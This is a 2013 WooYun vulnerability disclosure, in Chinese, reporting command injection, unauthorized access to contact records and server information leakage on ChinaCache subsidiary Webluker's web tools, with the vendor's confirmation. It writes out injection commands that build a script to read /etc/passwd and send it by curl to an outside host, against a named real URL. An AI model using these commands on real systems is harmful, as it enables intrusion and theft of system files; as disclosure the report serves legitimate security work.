当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047050

漏洞标题:ChinaCache旗下豆豆网命令执行及越权访问(非struts)

相关厂商:ChinaCache

漏洞作者: 专业种田

提交时间:2013-12-26 09:35

修复时间:2014-02-09 09:35

公开时间:2014-02-09 09:35

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-26: 细节已通知厂商并且等待厂商处理中
2013-12-26: 厂商已经确认,细节仅向厂商公开
2014-01-05: 细节向核心白帽子及相关领域专家公开
2014-01-15: 细节向普通白帽子公开
2014-01-25: 细节向实习白帽子公开
2014-02-09: 细节向公众公开

简要描述:

圣诞节被人抛弃了,只能挖挖漏洞了。
北京豆豆网络科技有限责任公司是北京蓝汛(ChinaCache)的子公司,成立于2011年,Webluker是北京豆豆网络旗下品牌

详细说明:

1、命令执行漏洞
在snmp探测工具中未对目标地址进行过滤,可直接输入``来执行命令。
http://www.webluker.com/webtools/snmp
因为没有回显,我使用的方法是通过Curl命令, Url传参把想到的数据传到指定的网站,然后查看日志获取返回结果。

08.jpg


一次只能执行一个命令,使用:分号或者 &&方式执行多个命令,不怎么好使。我直接写入脚本再执行。
如:想获取/etc/passwd的内容,分别执行如下代码:

`echo "hack='\`cat /etc/passwd|awk -v RS='' -v OFS='|' '$1=$1'\`'" > /tmp/hack.sh`
`echo 'curl http://www.wooyun.com/a.php?hacking=$hack' >> /tmp/hack.sh`
`sh /tmp/hack.sh`


查看网站日志(这个请求的网站你必须有权限看到日志)

s1.jpg


2、联系人信息越权访问,这里不多说。
http://my.webluker.com/user/editManager/?m_id=4

QQ截图20131226010327.jpg


3、创建设备监控时,限制不严,可获取服务器本机的硬件信息.不过要抓包,再修改IP才可以。

s10604.jpg

漏洞证明:

e0719.jpg


至于拿Shell,程序大多是Python的,而且网站目录不可写。所以放弃了,应该有其它办法可以的。

修复方案:

过滤!权限控制!

版权声明:转载请注明来源 专业种田@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-12-26 10:04

厂商回复:

再次感谢 @专业种田!
经确认问题确实存在,我们正在修复。
感谢提醒!

最新状态:

暂无